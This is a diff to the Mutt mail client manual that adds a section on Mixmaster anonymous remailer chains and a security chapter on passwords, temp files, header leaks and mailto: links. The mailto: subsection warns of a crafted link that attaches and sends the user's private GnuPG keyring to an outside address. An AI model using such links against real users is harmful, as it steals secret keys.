+<sect1 id="sending-mixmaster">
+<title>Sending Anonymous Messages via Mixmaster</title>
+
+<para>
+You may also have compiled Mutt to co-operate with Mixmaster, an
+anonymous remailer. Mixmaster permits you to send your messages
+anonymously using a chain of remailers. Mixmaster support in Mutt is for
+mixmaster version 2.04 (beta 45 appears to be the latest) and 2.03.
+It does not support earlier versions or the later so-called version 3 betas,
+of which the latest appears to be called 2.9b23.
+</para>
+
+<para>
+To use it, you'll have to obey certain restrictions. Most
+important, you cannot use the <literal>Cc</literal> and <literal>Bcc</literal> headers. To tell
+Mutt to use mixmaster, you have to select a remailer chain, using
+the mix function on the compose menu.
+</para>
+
+<para>
+The chain selection screen is divided into two parts. In the
+(larger) upper part, you get a list of remailers you may use. In
+the lower part, you see the currently selected chain of remailers.
+</para>
+
+<para>
+You can navigate in the chain using the <literal><chain-prev></literal> and
+<literal><chain-next></literal> functions, which are by default bound to the left
+and right arrows and to the <literal>h</literal> and <literal>l</literal> keys (think vi
+keyboard bindings). To insert a remailer at the current chain
+position, use the <literal><insert></literal> function. To append a remailer behind
+the current chain position, use <literal><select-entry></literal> or <literal><append></literal>.
+You can also delete entries from the chain, using the corresponding
+function. Finally, to abandon your changes, leave the menu, or
+<literal><accept></literal> them pressing (by default) the <literal>Return</literal> key.
+</para>
+
+<para>
+Note that different remailers do have different capabilities,
+indicated in the %c entry of the remailer menu lines (see
+<link linkend="mix-entry-format">$mix_entry_format</link>). Most important is
+the <quote>middleman</quote> capability, indicated by a capital <quote>M</quote>: This
+means that the remailer in question cannot be used as the final
+element of a chain, but will only forward messages to other
+mixmaster remailers. For details on the other capabilities, please
+have a look at the mixmaster documentation.
+</para>
+
+</sect1>
+
+</chapter>
+
+<chapter id="security">
+<title>Security Considerations</title>
+
+<para>
+First of all, Mutt contains no security holes included by intention but
+may contain unknown security holes. As a consequence, please run Mutt
+only with as few permissions as possible. Especially, do not run Mutt as
+the super user.
+</para>
+
+<para>
+When configuring Mutt, there're some points to note about secure setups
+so please read this chapter carefully.
+</para>
+
+<sect1 id="security-passwords">
+<title>Passwords</title>
+
+<para>
+Although Mutt can be told the various passwords for accounts, please
+never store passwords in configuration files. Besides the fact that the
+system's operator can always read them, you could forget to mask it out
+when reporting a bug or asking for help via a mailing list. Even worse,
+your mail including your password could be archived by internet search
+engines, mail-to-news gateways etc. It may already be too late before
+you notice your mistake.
+</para>
+
+</sect1>
+
+<sect1 id="security-tempfiles">
+<title>Temporary Files</title>
+
+<para>
+Mutt uses many temporary files for viewing messages, verifying digital
+signatures, etc. As long as being used, these files are visible by other
+users and maybe even readable in case of misconfiguration. Also, a
+different location for these files may be desired which can be changed
+via the <link linkend="tmpdir">$tmpdir</link> variable.
+</para>
+
+</sect1>
+
+<sect1 id="security-leaks">
+<title>Information Leaks</title>
+
+<sect2 id="security-leaks-mid">
+<title>Message-Id: headers</title>
+
+<para>
+Message-Id: headers contain a local part that is to be created in a
+unique fashion. In order to do so, Mutt will <quote>leak</quote> some
+information to the outside world when sending messages: the generation
+of this header includes a step counter which is increased (and rotated)
+with every message sent. In a longer running mutt session, others can
+make assumptions about your mailing habbits depending on the number of
+messages sent. If this is not desired, the header can be manually
+provided using <link
+linkend="edit-headers">$edit_headers</link> (though not
+recommended).
+</para>
+
+</sect2>
+
+<sect2 id="security-leaks-mailto">
+<title><literal>mailto:</literal>-style Links</title>
+
+<para>
+As Mutt be can be set up to be the mail client to handle
+<literal>mailto:</literal> style links in websites, there're security
+considerations, too. Arbitrary header fields can be embedded in these
+links which could override existing header fields or attach arbitrary
+files using <link linkend="attach-header">the Attach:
+psuedoheader</link>. This may be problematic if the <link
+linkend="edit-headers">$edit-headers</link> variable is
+<emphasis>unset</emphasis>, i.e. the user doesn't want to see header
+fields while editing the message and doesn't pay enough attention to the
+compose menu's listing of attachments.
+</para>
+
+<para>
+For example, following a link like
+</para>
+
+<screen>
+mailto:joe@host?Attach=~/.gnupg/secring.gpg</screen>
+
+<para>
+will send out the user's private gnupg keyring to
+<literal>joe@host</literal> if the user doesn't follow the information
+on screen carefully enough.
+</para>
+
+</sect2>
+
+</sect1>
+
+<sect1 id="security-external">
+<title>External Applications</title>
+
+<para>
+Mutt in many places has to rely on external applications or for
+convenience supports mechanisms involving external applications.
+</para>
+
+<para>
+One of these is the <literal>mailcap</literal> mechanism as defined by
+RfC1524. Details about a secure use of the mailcap mechanisms is given
+in <xref linkend="secure-mailcap"/>.
+</para>
+
+<para>
+Besides the mailcap mechanism, Mutt uses a number of other external
+utilities for operation, for example to provide crypto support, in
+backtick expansion in configuration files or format string filters. The
+same security considerations apply for these as for tools involved via
+mailcap.
+</para>
+
+</sect1>
+
projects / software / mutt-debian.git / blobdiff